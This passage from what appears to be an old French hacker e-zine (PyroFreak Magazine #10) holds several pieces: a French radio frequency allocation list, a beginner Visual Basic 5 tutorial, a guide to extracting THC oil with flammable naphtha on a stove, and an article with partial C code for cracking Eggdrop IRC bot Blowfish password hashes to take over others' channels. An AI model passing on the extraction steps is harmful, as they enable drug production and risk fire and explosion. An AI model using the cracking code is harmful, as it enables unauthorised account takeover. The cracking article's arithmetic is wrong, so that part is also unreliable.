68.000  68.460 MHz usage militaire
68.462  69.250 MHz rseaux privs, douanes
69.250  70.250 MHz usage militaire
70.250  70.525 MHz rseaux militaire
70.525  70.975 MHz usage militaire
70.975  71.950 MHz rseaux privs
71.950  72.500 MHz usage militaire, EDF
72.512  73.300 MHz rseaux privs, douanes
73.300  74.800 MHz Gendarmerie Nationale
74.800  75.200 MHz radiolocalisation aronautique
75.300  77.475 MHz rseaux privs, taxis
77.475  80.000 MHz Gendarmerie Nationale
80.000  82.475 MHz rseaux privs, taxis
82.475  83.000 MHz usage militaire
83.000  87.300 MHz police, pompiers, SAMU
87.340  87.415 MHz systme Eurosignal
87.500  108.000 MHz radiodiffusion FM (bande II)
108.800  112.00 MHz balisage aronautique (ILS)
108..000  118.000 MHz usage militaire
111.600  177.900 MHz balise aronautique (VOR)
118.000  136.000 MHz trafic aronautique (bande "air" ou "aviation")
136.000  138.000 MHz satellites
138.000  144.000 MHz usage militaire
143.9875  144.000 MHz frquence rserve "vol libre"
144.000 ,146.000 MHz trafic amateur (bande des "2 mtres")
146.000  156.000 MHz trafic aronautique
151.000  151.425 MHz rseaux "R 150"
151.425  152.380 MHZ rseaux privs
152.880  152.975 MHz rseaux "R 150"
152.975  156.025 MHz trafic maritime et fluvial (bande "VHF marine")
156.025  157.425 MHz trafic maritime et fluvial (bande "VHF marine")
157.425  157.575 MHz rseaux privs
157.575  160.200 MHz rseaux "R 150"
160.200  160.625 MHz rseaux privs
160.625  160.950 MHz trafic maritime et fluvial (bande "VHF marine")
160.975  161.475 MHz rseaux privs
161.550  162.025 MHz trafic maritime et fluvial (bande "VHF marine")
162.500  162.525 MHz trafic maritime et fluvial (bande "VHF marine")
165.200  168.900 MHz tlphone de voiture Radiocom 2000
169.800  173.500 MHz tlphone de voiture Radiocom 2000
176.500  183.500 MHz tlphone de voiture Radiocom 2000
184.500  189.100 MHz tlphone de voiture Radiocom 2000
192.500  197.100 MHz tlphone de voiture Radiocom 2000
197.700  199.500 MHz tlphone de voiture Radiocom 2000
200.500  207.500 MHz tlphone de voiture Radiocom 2000
208.500  215.500 MHz tlphone de voiture Radiocom 2000
216.500  223.500 MHz tlphone de voiture Radiocom 2000
225.000  400.000 MHz trafic aronautique et usage militaire 
406.100  410.000 MHz rseaux privs
414.500  418.000 MHz tlphone de voiture Radiocom 2000
418.000  420.000 MHz rseaux privs
424.500  428.000 MHz tlphone de voiture Radiocom 2000
430.000  440.000 MHz trafic amateur (bande "432")
440.000  444.600 MHz tlphone de voiture ligne SFR 
444.600  447.000 MHz rseaux privs
450.000  454.600 MHz tlphone de voiture ligne SFR 
454.600  456.000 MHz police, pompiers, SAMU
456.000  457.675 MHz rseaux privs
457.675  458.225 MHz SNCF
463.000  464.000 MHz rseaux privs
464.000  466.000 MHz police, pompiers, SAMU 
466.000  467.675 MHz rseaux privs
467.675  468.225 MHz SNCF
468.325  470.000 MHz rseaux privs
470.000  606.000 MHz tlvision (bande IV)
614.000  880.000 MHz tlvision (bande V)
884.000  890.000 MHz tlphone sans cordons
890.000  915.000 MHz tlphone de voiture GSM
929.000  935.000 MHz tlphone sans cordon
935.000  960.000 MHz tlphone de voiture GSM
960.000  1215.000 MHz aronautique: IFF, TACAN, DME
1240.000  1300.000 MHz trafic amateur


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 9-Vb5 Tutorial..
|( ) Phreak ( ) Hack (X) Autres
'._______Par Vip0|a ____________________ ______ vipola@pyrofreak.org ___


Bon alors, cet arcticle est le premier d'une suite portant sur Microsoft
Visual Basic version 5.0. Ne vous attendez pas a avoir des sources miracle
pour cr un tetris ou un IRC client. Mais, pour ce premier numro, plutt
une introduction du logiciel et de son Fonctionnement en gnral. Bien
entendu, cette suite d'arcticle s'adresse au dbutant, mais qui sait,
peut-tre n'en savez-vous pas autant que vous le croyez,

  Le Basic:
		Le basic est le langage utilis en Visual Basic, on pense
		tout de suite au Basic lorsqu'on entend "Q-Basic", un
		logiciel de programmation en DOS qui ressemble
		particulirement  "edit.com"

		Microsoft a repris Qbasic et en a fait une version
		plus visual donc plus "frendly" en utilisant le mode
		de Programmation par Object.

  VB5?
		La Raison pour laquelle j'ai opt pour la version 5 de
		Visual Basic, c'est parceque la majorit des personnes
		utilisent Vb5 ou savent o se le procur.

  Description de l'interface
  

  Barre de Menu:

		Elle Comprend tout les Commandes disponible de Visual
		Basic. Ce n'est pas la plus rapide, mais on fini tjr
		par y trouver ce que l'on cherche.

  Barre de Bouton:

		Elle comprend les commandes les plus courante:
			 Enregistrer
			 Ouvrir
			 Ajouter une Feuille
			 Executer
			 Stop

  Barre de Controle:

		C'est ici que trouve tout les controles qui sont  votre
		disposition, il vous suffit de cliquer sur le controle
		dsir puis all faire une sleciton sur la feuille de
		travail. Vous pouvez galement doublecliquer dessus.
		sa en metera un au centre de la feuille.

  Feuille de Travail:

		C'est ici que l'on consoit le programme, les programmes
		peuvent tre compos d'une ou plusieur feuille.

  Fentre de Proprit:  (F4)

		C'est ici que s'affiche les proprits des objects slectionns.
		Voici la dfinition des proprits le splus souvant rencontr:

		Name:	Le nom de l'objet, chaque objet doit avoir un nom qui
			lui est propre. c'Est avec celui-ci qu'on l'identifie.

		Caption & Text:	Le caption contien le texte que l'objet affichera.
				Le caption ne peut tre modifier  l'aide du
				clavier lors de l'xcu du programme,
				contrairement au text

		ToP:	Cette valeur reprsente l'quart entre le haut de l'object
			et sa limite suprieur (par raport a ce dans quoi il se
			situe). Ex: un bouton dans une feuille, une feuille dans
			l'crant, un label dans un picturbox.

		Left:	Cette valeur reprsente l'quart entre le cot gauche
			l'object et sa limite de de gauche.

		Height:	Cette Valeur reprsente la largeur vertical de l'objet

		weight:	Cette valeur reprsente la largeur horizontale de l'objet


  Le Codage:  (F7)
		Pour entr du codage, vous devez double cliquer sur l'objet en question.


  ________
  Notions:	(End)
  
		La fonction END sert a terminer le programme.

  ____________
  Exercice 1.1	(Fonction End)
  
		Nous Allons Maintenant raliser notre premier programme:

			- Ouvrez un nouveau projet Visual Basic

			- Insrez un bouton sur la feuille

			- Double-Cliquez sur le bouton pour en affich le codage (F7)

			- Vous verrez le codage suivant:

				Private Sub Command1_Click()

				End Sub

			- Entre les 2 lignes, insrez la fonction END, comme ceci:

				Private Sub Command1_Click()
				   End
				End Sub

			- Maintenant, fermez la fentre de codage et appuyez sur Play (F5).

		Voici votre premier programme en Visual Basic. Si vous cliquez
		sur le bouton , le programme se terminera, c'est l'utilit de la
		fonction END.

  ________
  Notions:	(Proprits)
  
		Lorsqu'on change une proprite d'un objet avec du codage, on doit
		toujour conserver la syntaxe suivante:

				[Feuille.]objet.priprit = Nouvelle Valeur

  ____________
  Exercice 1.2	(Proprits, textes et Caption)
  
			- Ouvrez un nouveau projet Visual Basic

			- Cette vois, disposez y les objets suivant comme le
			  prsente l'image exercice1_2.jpg :

				Boutons:	Name:		Caption:
								
						Bo_Quit		Quitter
						Bo_Raz		RAZ
						Bo_Copy		Copy

				Ettiquettes:	Names:		Caption:
								
						Et_Destination	'Rien'

				Zone de Texte:	Names:		Text:
								
						Zt_Enter	'Rien'


			- Entrez, dans le bouton appropri, le codage suivant:

				Private Sub Bo_Copy_Click()
				   Et_Destination.Caption = Zt_Enter.Text
				End Sub

				Private Sub Bo_Raz_Click()
				   Et_Destination.Caption = ""
				   Zt_Enter.Text = ""
				End Sub

				Private Sub Bo_Quit_Click()
				   End
				End Sub


		Executez le programme, vous remarquerez que le bouton RAZ efface
		tout, il prend les opriprits caption et text de l'tiquette et
		de la Zone de Texte et leur donne les valeur "" (aucune, null)
		donc, rien. Le bouton Copy lui, prend le texte que vous avez
		saisit dans la Zone de Texte, et l'affiche dans l'tiquette. Il
		prend la valeur de la priprits Text du Zt_Enter et l'applique
		 la proprit Caption de Et_Destination. Le bouton Quitter lui,
		fait la mme chose qu' l'exercice prcdant.

  ________
  Notions:	(La Variable)
  
		Une variable est un endroit o l'on peut stoquer des information, elle est
		idale pour stoker des information temporairement, c'est un peut comme si
		vous aviez une tiquette Invisible.

  ____________
  Exercice 1.3	(Proprits, textes et Caption)
  
			- Prenez l'exercice N2

			- Faites Affich la fentre de codage

			- Allez completement en haut [(Generals), (Declaration)]

			- Inscrivez y:

				Dim Va_Copy

			- Remplacez le codage de Bo_Copy ppar le suivant:

				Private Sub Bo_Copy_Click()
				   Va_Copy = Zt_Enter.Text
				   Et_Destination.Caption = Va_Copy
				End Sub

		Le programme fait exactement la mme chose qu'avant, mais il ne
		fonctionne pas de la mme fasson, Au lieu de mettre directement
		la valeur de Zt_Enter.Text dans Et_Destination.Caption, il met
		dabord la valeur dans la variable Va_Copy puis va chercher le
		contenue de celle-ci dans Et_Destination.Caption.

  ________
  Notions:	(Modifier une Variable)
  
		Modifier une donne en la fesant pass par une variable est beaucoup plus
		simple que de la modifier directement.

		Fonction Val(String):	La fonction Val sert  transform une valeur
					en donn numrique.

		Fonction Str(number):	La fonction Str sert  transform une valeur
					en donn texte(String)

		N.B.		"123" est une donn string
				123 quand  lui, est une donn numrique
				on peut pass d'un a lautre  l'aide de Val et Str.

  ____________
  Exercice 1.4	(Fonction Val, Modifier une variable)
  
			- Prenez l'exercice N3

			- Modifier le codage de Bo_Copy par:

				Private Sub Bo_Copy_Click()
				   Va_Copy = Val(Zt_Enter.Text)
				   Va_Copy = Va_Copy + 5
				   Et_Destination.Caption = Va_Copy
				End Sub

		 Maintenant, executez le programme(F5), Entrez un nombre dans
		 Zt_Enter et appuyez sur le bouton Copy. Vous remarquerez que
		 la valeur que vous avez entr dans Zt_Enter  t additionn
		 de 5 puis appliquer  Et_Destination.

  ________
  Notions:	(Calcules Mathmatique)
  
		Vous pouvez faire une multitude de calcule mathmatique avec Visual Basic.

			Voici comment:

			Pour faire:			Codage:
			                      
			  5 + 2				 5+2

			  5 - 2				 5-2

			  5  2				 5/2

			  5  2				 5*2

			  5				 5^2

			 5 + 7
			 -------			(5^3+7^2)/5^2
			   5
			   ___
			  V 9				 9^(1/2)


  ____________
  Exercice 1.5	(Calcule Mathmatique)
  
		Dans cet exercice, nous allon prendre l'exercice N4 et remplac la
		ligne  Va_Copy = Va_Copy + 5  de Bo_Copy par les suivantes  tour
		de rle pour obtenir les rsultats voulus.

			- Variable + 4			Va_Copy = Va_Copy + 4
			   ____
			- V 25   - Variable		Va_Copy = 25^(1/2) - Va_Copy

			- 177  33 + Variable + 2	Va_Copy = (177/33) + Va_Copy + 2

			- 3 + 1  Variable		Va_Copy = 3^2+1 * Va_Copy

			- Varioable  la puissance 19	Va_Copy = Va_Copy ^19

		Excutez le programme et entrez un chiffre dans Zt_Enter. Si vous
		vrifiez avec une calculatrice, vous remarquerez que tout s'est bien
		produit dans l'ordre.

  ____________
  Exercice 1.6	(Cration d'une calculatrice)
  
			- Affichez un nouveau projet VB  l'cran

			- crez les objets suivant comme le prsente l'image
			  exercice1_6.jpg :

				Boutons:	Name:		Caption:
								
						Bo_Quit		Quitter
						Bo_Raz		RAZ
						Bo_Plus		+
						Bo_Moin		-
						Bo_Multi	x
						Bo_Divi		/

				Zone de Texte:	Names:		Text:
								
						Zt_Enter1	'Rien'
						Zt_Enter2	'Rien'
						Zt_Reponse	'Rien'

			- Donnez le nom F_Main et le caption Calculatrice  votre feuille
			  de travail.

			- Entrez la fonction End dans le Bo_Quit comme d'habitude.

			- Entrez dans le Bo_Raz le codage suivant:

				Private Sub Bo_Raz_Click()
				   Zt_Enter1.Text = ""
				   Zt_Enter2.Text = ""
				   Zt_Reponse.Caption = ""
				End Sub

			- Entrez dans le Bo_Plus le codage suivant:

				Private Sub Bo_Plus_Click()
				   Va_Val1 = Val(Zt_Entrer1.Text)
				   Va_Val2 = Val(Zt_Entrer2.Text)
				   Et_Reponse.Caption = Va_Val1 + Va_Val2
				End Sub

			- Entrez dans le Bo_Moin le codage suivant:

				Private Sub Bo_Moin_Click()
				   Va_Val1 = Val(Zt_Entrer1.Text)
				   Va_Val2 = Val(Zt_Entrer2.Text)
				   Et_Reponse.Caption = Va_Val1 - Va_Val2
				End Sub

			- Entrez dans le Bo_Multi le codage suivant:

				Private Sub Bo_Multi_Click()
				   Va_Val1 = Val(Zt_Entrer1.Text)
				   Va_Val2 = Val(Zt_Entrer2.Text)
				   Et_Reponse.Caption = Va_Val1 * Va_Val2
				End Sub

			- Entrez dans le Bo_Divi le codage suivant:

				Private Sub Bo_Divi_Click()
				   Va_Val1 = Val(Zt_Entrer1.Text)
				   Va_Val2 = Val(Zt_Entrer2.Text)
				   Et_Reponse.Caption = Va_Val1 / Va_Val2
				End Sub

			- Allez dfinir les Variables Va_Val1 et Va_Val2  l'aide de la
			  commande DIM:

				Dim Va_Val1, Va_Val2

		Excutez le programme puis entrez deux nombre dans chacun des textbox puis
		cliquez sur le bouton reprsentant l'opration que vous voulez leur faire
		effectus.

  ________
  Notions:	(MsgBox)
  
		Vous pouvez faire affich un message  l'utilisateur par le biait de la
		fonction MsgBox.

		Voici la syntaxe de la fonction MsgBox:

		MsgBox (Message [,Boutons] [,titre] [, Fichier d'aide, Numro de Contexte] )

	Message:
	
		Expression de Chane(String) affiche comme message dans la bote de
		dialogue. La longeur maximale de l'argument message est d'environ
		1 024 caractres (1 Ko) selon la largeur des caractres utiliss.
		Si l'argument message occupe plus d'une ligne, n'oubliez pas d'insrer
		un retour de chariot (Chr(13)) ou un saut de ligne (Chr(10)) entre les
		lignes, ou une combinaison de caractres retour chariot-saut de ligne
		(Chr(13) & Chr(10)).

	Boutons:
	
		Facultatif. Expression numrique qui reprsente la somme des valeurs
		indiquand le nombre et le type de boutons  afficher, le style d'icne
		 utiliser, l'identit du bouton par dfaut, ainsi que la modalit du
		message. Si l'argument bouton est omnis, sa baleur par dfaut est 0.
		

		Constante		Valeur	   Desctiption
					   
		vbOKOnly		0	Affiche le bouton OK uniquement.
		vbOKCancel		1	Affiche les boutons OK et Annuler.
		vbAbordRetryIgnore	2	Affiche le bouton Abandoner, Ressayer et Ignorer
		vbYesNoCancel		3	Affiche les boutons Oui, Non et Annuler
		vbYesNo			4	Affiche les boutons Oui et Non
		vbRetryCancel		5	Affiche les boutons Ressayer et Annuler
		vbCritical		16	Affiche l'icne Message critique
		vbQuestion		32	Affiche l'icne Requte d'avertissement
		vbInformation		64	Affiche l'icne Message d'Avertissement
		vbDefaultButton1	0	Le premier bouton est le bouton par dfaut
		vbDefaultButton2	256	Le deuxime bouton est le bouton par dfaut
		vbDefaultButton3	512	Le troisime bouton est le bouton par dfaut
		vbDefaultButton4	768	Le quatrime bouton est le bouton par dfaut
		vbApplicationModal	0	Bote de dialogue modale. L'utilisateur doit
						rpondre au message affich dans la zone de
						message avant de pouvoir continuer de travailler
						dans l'aplication en cours.
		vbSystemModal		4096	Modal systme. Toutes les applications sont
						interrompues jusqu' ce que l'utilisateur
						rponde au message affich dans la zone de
						message.

		Le premier groupe de valeurs (0  5) dcrit le nombre et le type de boutons
		affichs dans la bote de dialogue. Le deuxime groupe (16, 32, 48 et 64)
		dcrit le style d'icne. Le troisime groupe (0, 256, 512 et 768) dfinit
		le bouton par dfaut. Enfin, le quatrime groupe (0 et 4096) dtermine la
		modalit de la zone de message. Au moment d'additionner ces nombres pour
		obtenir la valeur finale de l'argument Bouton, ne slectionnez qu'un seul
		nombre dans chaque groupe.

	Titre:
	
		Facultatif. Expression de chane affiche dans la barre de titre
		de la bote de dialogue. Si l'argument title est omnis, le nom de
		l'application est plac dans la barre de titre.

	Fichier d'aide:
	
		Facultatif. Expression de Chane indiquand le fichier d'aide  utiliser
		pour fournis une aide contextuelle sur la bote de dialogue. Si l'argument
		Fichier d'Aide est dfini, l'argument Numro de Contexte doit l'tre galement.


	Numro de Contexte:
	
		Facultatif. Expression indiquand le numro de contexte attribu par l'auteur
		de l'aide  la rubrique approprie. Si l'argument Numro de Contexte est
		dfini, l'argument fichier d'aide doit l'tre galement.

	Valeur Renvoy:
	
		Constante		Valeur	   Boutton
					   
		vbOK			1	      OK
		vbCancel		2	      Annuler
		vbAbort			3	      Abandonner
		vbRetry			4	      Ressayer
		vbIgnore		5	      Ignorer
		vbYes			6	      Oui
		vbNo			7	      Non



	Si vous indiqurez  VB d'Affich des boutons particulier, MsgBox retournera
	un chiffre indiquand quel a t le bouton activ.

	Dans ce cas, vous devez pcifier une destination au donnes, comme suis:

		Dim X
		X = MsgBox ("Voulez-vous poursuivre ?" , 4 , "Erreur..")

  ____________
  Exercice 1.7	(MsgBox)
  
			- Affichez un nouveau projet VB  l'cran

			- Placez un bouton que vous nommerez Bo_Msg au centre de la Feuille
			  et insrez y le codage suivant:

				Private Sub Bo_Msg_Click()
				   MsgBox "Voici un Message-Box", "Pyrofreak Tutorial"
				End Sub

		Executez le programme et cliquez sur le bouton. Vous pouvez remarquer
		que VB Affiche une petite fentre avec le message "Voici un Message-Box"
		portant le titre "Pyrofreak Tutorial" et affichang le bouton OK.

  ____________
  Exercice 1.8	(MsgBox)
  
			- Prenez l'exercice du N7 et ajoutez-y les objects suivants:

				Zone de Texte:	Names:		Text:
								
						Zt_msg		'Rien'
						Zt_titre	'Rien'

			- Changez le codage du bouton pour le suivant:

				Private Sub Bo_Msg_Click()
				   MsgBox Zt_msg.Text, Zt_titre.Text
				End Sub

		Excutez le programme, entrez du texte dans Zt_msg et Zt_Titre puis appuyez
		sur le bouton. VB affichera le contenue de Zt_msg comme message et celui de
		Zt_titre comme titre de la fentre. fait la mme chose qu' l'exercice prcdant.

  ________
  Notions:	(Print)
  
		La fonction print, affiche du texte sur la feuille, sans ttiquettes ou rien.
		Elle rapporte a celle de Q-Basic qui servait a crire du texte.

			Syntaxe: Print Texte

  ________
  Notions:	(Cls)
  
		La fonction Cls sert a effac le texte affich  l'aide de la fonction Print.

			syntaxe: Cls

  ____________
  Exercice 1.8	(Print)

			- Ouvrez un nouveau projet VB et placez y les object suivants:

				Boutons:	Name:		Caption:
								
						Bo_Go		Go
						Bo_Raz		RAZ
						Bo_Quit		Quitter

				Ettiquettes:	Names:		Caption:
								
						Et_1		Titre
						Et_2		Message
						Et_1		Titre

				Zone de Texte:	Names:		Text:
								
						Zt_msg		'Rien'
						Zt_Titre	'Rien'

			- Entrez dans chacun des bouton le codage suivants:

				Private Sub Bo_Go_Click()
				   Dim X
				   X = MsgBox Zt_msg.Text, 4, Zt_titre.Text
				   cls
				   Print "No correspondant  la rponse: " & X
				End Sub

				Private Sub Bo_Raz_Click()
				   Cls
				   Zt_msg.text = ""
				   Zt_Titre.text = ""
				End Sub

				Private Sub Bo_Quit_Click()
				   End
				End Sub

			- Disposez le tout comme suggr dans exercice1_8.jpg
				
		Excutez le programme puis Entrez une question et un Titre et appuyez sur GO.


	Bon.. C'est tout pour la premire partie.. je vous reviendrai dans le prochain
	numro de Pyrofreak avec une suite. D'ici la.. 
			Bonne chance..		 Mes P'ti MaDz Pr0Gr4MerZz!!


								- Vip0|a


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 10-Fabrication d'huile de THC
|( ) Phreak ( ) Hack (X) Autres
'.__________Par Neuro________  ________  neuro@pyrofreak.org ______ ___

Salut tous,
           tout rcemment, j'ai tester une mthode pour faire de l'huile,
qui  ma grandre surprise a t d'une "mga" simplicit et qui  t trs
fficace sur mon cerveau. C'est pourquoi j'ai dcid de vous la communiquer.

                                    |
                                   |.|
                                   |.|
                                  |\./|
                                  |\./|
                  .               |\./|               .
                   \^.\          |\\.//|          /.^/
                    \--.|\       |\\.//|       /|.--/
                      \--.| \    |\\.//|    / |.--/
                       \---.|\    |\./|    /|.---/
                          \--.|\  |\./|  /|.--/
                             \ .\  |.|  /. /
                   _ -_^_^_^_-  \ \\ // /  -_^_^_^_- _
                     - -/_/_/- ^ ^  |  ^ ^ -\_\_\- -
                                    |


**Matriaux Ncessaires**

-Filtre  caf 
-Canne de conserve vide sans le papier a l'entour OU un chaudron, mais dite
 vous que celui-ci ne sera plus bon par la suite.
      (La Grosseurs dpend du nombre de grammes de marijuana que vous voulez 
                                                   transformer en huile)
-Gaz  fondu (Naftam avec anti-rouille) (Gaz de couleur bleu qui se vend
                                         dans toute les piceries)
-Votre feuille ou trime de marijuana
-Un bol plus ou gal grandeur que la canne de conserve
-Un baton rond soit en bois ou en mtal pour craser et mlanger la marijuana 
-Un rond de poil
-Un Ouvre boite 
-Un Exacto de prfrence ou sinon un couteau fera l'affaire


**Les mises en garde**

ATTENTION: Le gaz  fondu est explosif et trs flammable, donc fate trs
           attention, et essayer d'avoir une porte de sortie prs de votre
           rond de poil, pour en cas de feu, pouvoir jeter votre mlange
           en dehors de la maison. Un Extincteur a porter de la main serait
            vous conseiller. On ne sait jamais c quoi qui peut arriver.

           Je vous conseille aussi de faire cela dans un endroit bien ar.
           Je vous donne un exemple, c'est ma mthode, j'ouvre la fentre 
           coter du poil, je laisse la porte entre-ouverte, pour que l'air
           circule, et aussi pour quand qu'a de feu, je peuve l'ouvrir 
           facilement et rapidement, et j'ouvre la "fan" de mon poil pas
           trop forte, de faon  bien entendre si le mlange vient  faire
           de grosses bulles ou un sifflement.






**Les parties**

D'aprs mon exprience personnel, qui n'est pas encore dvellop au
maximum, il faut 1 bouteille de 500 ml de gaz  fondu pour 85 grammes
de feuille ou de trime de marijuana. Mais je vais vous donner un truc trs
simple pour savoir comment qui vous faut de gaz selon la feuille que vous
avez. Mettez votre feuille dans votre bol, et verser du gaz, jusqu'a temps
que la marijuana soit recouverte au complet. Aussi simple que cela.


**Extraire le THC**

Aprs avoir mlang votre pot et le gaz dans le bol, vous prenez votre baton
et vous brasser le mlange, le remuer, l'craser, le tourner. Le liquide
va virer  une couleur verdtre bien assez vite. Ensuite laisser reposer le
mlange durant quelques heures (6-8), le temps que le THC s'extrait bien
de la marijuana. 6 heures est un minimum, vous pouvez le laisser beau-
coup plus longtemps pour une meilleur efficicacit.


**Filtrage**

Vous mettez votre filtre  caf par dessus votre canne de conserve, vous
verser votre solution, qui devrais etre d'un vert trs fonc, si vous avez
pas trop mis de gaz. Quand le liquide  fini de couler, verser maintenant
la marijuana aussi dans le filtre, et excerser une pression sur le filtre
avec vos mains, pour bien extraire le plus possible le THC du pot. Ensuite
jeter la marijuana, elle est rendu infumable, bref cela est mon avis, mais 
si ca vous dis de fumer de la marijuana explosif qui buzz pas, faite cela
 votre tte. Laver vous bien les mains par la suite, le gaz rentre dans 
peau.


**Cuisson**

Metter votre canne de conserve sur le rond, et faite chauffer celui-ci au
minimum (Entre le rcheau et le niveau 2, (cela est bas d'apres mon poil 
et une petite quantit de feuilles)). Tester le vous mme vous allez savoir
 quel temprature faut ajuster votre rond. Faut que le mlange fasse de tres
petites bulles, sans faire de sifflement.

ATTENTION: Si le mlange fais de grosses bulles, ou/et un sifflement trs
           intense, baisser la chaleur de votre rond immdiatement.



Bon, maintenant que quasi tout le gaz  fondu soit vaporer, ils vous reste
2 tapes avant l'tape ultime qui est de tester votre "Stock". Si vous avez
pris une canne de conserve, j'ai un truc pour vous, qui va vous faire conomiser
du temps, et aussi beaucoup de patience. Couper le fond de la canne en question
avec un ouvre boite. 90% de votre huile se retrouve justement sur ce fond de 
canne. Ensuite avec un exacto, il ne reste plus qu'a gratter le fond de la
canne le plus possible, et dposer au fur  mesure l'huile sur une surface
plate et lisse.

Par la suite, reprener petit par petit votre huile (A coup de .3 gram environ),
avec votre exacto, de facon a faire seulement une boule. Vous prener un lighter
et vous allumer votre bite. Une flamme d'environ 5 secondes va se produire
quand vous allumiez votre produit, et l'huile va retomber de lexacto par
elle meme. C pour liminer le plus possible le restant de gaz restant dans
l'huile. Si l'huile devient toute sec aprs cet opration, c'est peut-tre
 cause qui reste encore trop de gaz dans votre huile.

Bon, et maintenant avec l'huile obtenu, vous pouvez tripper au max, et cela
ne vous aura pas couter trop cher. Si vous voyez quel gote encore trop le 
gaz a fondu, recommencer la dernire opration.



**Moyen pour peser votre huile**

Beaucoup de monde trouvent que peser l'huile peut s'avrer d'une difficult
extreme, heh bien, j'ai la solution  votre problme. Prener votre balance
habituelle, peser-y un bouchon de biere, et inscriver bien son poid. Ensuite
vider directement l'huile dans le bouchon de biere et cela sur la balance.
Avec cela vous pouvez savoir exactement quand vous aller avoir atteint la
quantit dsir, sans faire de dgat, et je trouve ca pratique dans un 
bouchon de bire.


Nb de Neuro: Une version de cet article plus dtaill est prvu dans les 
             prochaines semaines, elle sera disponible sur le site web
             de PyroFreak (Www.PyroFreak.Org) dans les textes Onlines.

 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
|11-Les secrets d'Eggdrop enfin dvoils
|( ) Phreak (X) Hack ( ) Autres
'.__________Par LeMarquis________  ________  lemarquiz@yahoo.com ______ ___



	Eggdrop est un programme trs populaire sur le net. Il permet de 
configurer un bot sur un serveur unix. Le bot doit faire l'authentification 
de chaque OP du channel pour les oper. Il doit donc mmoriser chaque 
utilisateurs et leur password correspondant. L'ensemble de cette information 
est enregistre dans son fichier de configuration: eggdrop.conf. Ce fichier 
est accessible sur le serveur qui runne le eggdrop. Qui n'a jamais vu sur un 
quelconque serveur unix un eggdrop en activit?. Si l'on arrive  lire son 
fichier de configuration, nous pourrions dcrypter les password et avoir du 
plaisir sur leur channel irc.


Exemple de eggdrop.conf:

[..]
Franck     - -
! #pyrofreak                0 fmnov
--HOSTS *!lemarquis@*.sprint.ca
--PASS +kxW5Q0AvijV1
--XTRA created 936417875
--COMMENT user trs cool
[...]


Nous avons ici le hostname mask du user. Nous devons l'avoir pour que le bot 
nous accepte. Ensuite on retrouve le password encrypter "+kxW5Q0AvijV1". Ce 
password est encrypter en blowfish. Tout comme le DES nous ne pouvons pas 
reverser l'encryption et obtenir le password en refaisant l'algorithme  
l'envers. Mais nous pouvons a l'image de john de ripper, faire un programme 
qui  l'aide d'une liste de mots (wordlist) encrypterait chaque mots et les 
comparerait avec le password encrypter que nous tentons de dcouvrir. Ce type 
de dcryption est pratique pour les passwords simples. Par contre, la tche 
est longue et ardue pour des password de fortes complexits. Comme le 
cracking du DES, ce type d'attaque require beaucoup de cpu power. 


Le blowfish utilis dans eggdrop a un grosseur de key d'encryption pouvant 
aller jusqu' 448 bits. Ce type d'encryption est sans copyright et est peru 
comme secure. Son prdcesseur le DES qui a une key de 56-bit que l'on sait 
trs vulnrable  la brute force. Avec des hardware spciaux la NSA serait 
probablement capable de faire le tour de toutes les possibilits de password 
en 3 heures. Le brute force cracking du Blowfish demande donc beaucoup
plus de temps et de cpu power que le DES.

Dernirement, j'ai vu dans les nouveauts de scurit un programme de 
Hydrogen et X Organisation qui tait un rip du code blowfish de eggdrop qui 
encryptait chaque mots d'une liste. Nous devions faire un grep avec le 
password que l'on voulait deviner sur la wordlist encrypte. J'ai tout de 
suite imaginer le potentiel de ce programme encore embryonnaire et peu 
rapide. Avec les procdures d'encryption de leur programme j'ai tent de 
crer un programme semblable a John the Ripper. J'ai ainsi incorporer une 
brute force attaque ne requrant aucun wordlist.

Code principal:
[..]
 if(mode==1){                                             /* wordlist cracking */
   if(inputfile==0) help(argv[0]);
   dict = (argc > 1) ? fopen(inputfile, "r") : stdin;
   printf("Guessing %s with wordlist %s\n\n",check,inputfile);
   while(!feof(dict)){                                    /* pour chaque word de la wordlist..*/ 
      fscanf(dict, "%s", plain);
      blowfish_encrypt_pass(plain, crypted, 0);           /* encrypter le word */
      if(view) fprintf(stdout, "%s<->%s<->%s\n",plain,crypted,check);
      i++;
      if(!strcmp(crypted,check)) result;                 /* vrification si c'est le bon pass */
      memset(&crypted, 0, sizeof(crypted));}
      printf("done. tryed %d guess\n", i);}     
 if(mode==2){                                            /* brute force cracking */
[..]
   printf ("5 Characters Long..\n");
   plain[5] = '\0';
   for (i = nb1; i < nb2; i++){                            /* pour chaque lettre j'incremine
                                                              dans le ANSI */
   for (j = nb1; j < nb2; j++){
   for (k = nb1; k < nb2; k++){
   for (l = nb1; l < nb2; l++){
   for (m = nb1; m < nb2; m++){
      plain[0] = i; plain[1] = j; plain[2] = k; plain[3] = l;
      plain[4] = m;
      blowfish_encrypt_pass(plain, crypted, 0);
      if(view) fprintf(stdout, "%s<->%s<->%s\n",plain,crypted,check);
      if(!strcmp(crypted,check)) result;}}}}}


Les variable nb1 et nb2 reprsentent l'tendu du ANSI dans lequel nous 
creons nos mots. Pour nb1=33 et nb2=126, nous essayerons toute les 
possibilit de mots comprenant tous les caractre possible (^*&!%AsDsa231). 
Pour un password de 5 caractres cela nous fait 5^57 (nb2-nb1=57) possibilit 
de password. Faire l'ensemble de ces password et les comparer au password  
trouver serait terriblement long. C'est pourquoi, j'ai mis 4 types de brute 
force sur mon programme. Avec le mode numrique nous pouvons facilement 
deviner un password composer uniquement de chiffre. Avec 4 caractre nous 
avons 5^9 possibilits de password, nous venons d'conomiser
des heures de cracking.


nb1=65 ---> nb2=122 : caractre alphabtique (A-Z,a-z)
nb1=48 ---> nb2=57   : caractre numrique (0-9)
nb1=48 ---> nb2=122 : caractre alphanumrique (A-Z,a-z,0-9)
nb1=33 ---> nb2=126 : toute les possibilits de caractre (^*&!%AsDsa231)


Lorsque que l'on interrompt notre session de cracking, le programme nous 
donne les chiffres reprsentants o le cracking s'est rendu. Ce sont les 
variables i,j,k,l,m,n. Elles reprsentent chaque caractres du dernier 
password test. Plus le chiffre est haut, plus notre cracking tait avanc. 
Le chiffre ne reprsente pas directement le nombre d'essai car une attaque du 
ANSI 48 au 57 ne donnera que des valeur entre 48 et 57.


Exemple:
Dernier password test: 1338
Stoped at: 0 0 0 48 51 51 49

o --> caractre 7 = 0
n --> caractre 6 = 0
m --> caractre 5 = 0
l --> caractre 4 = 48  ==> 1
k --> caractre 3 = 51  ==> 3
j --> caractre 2 = 51  ==> 3
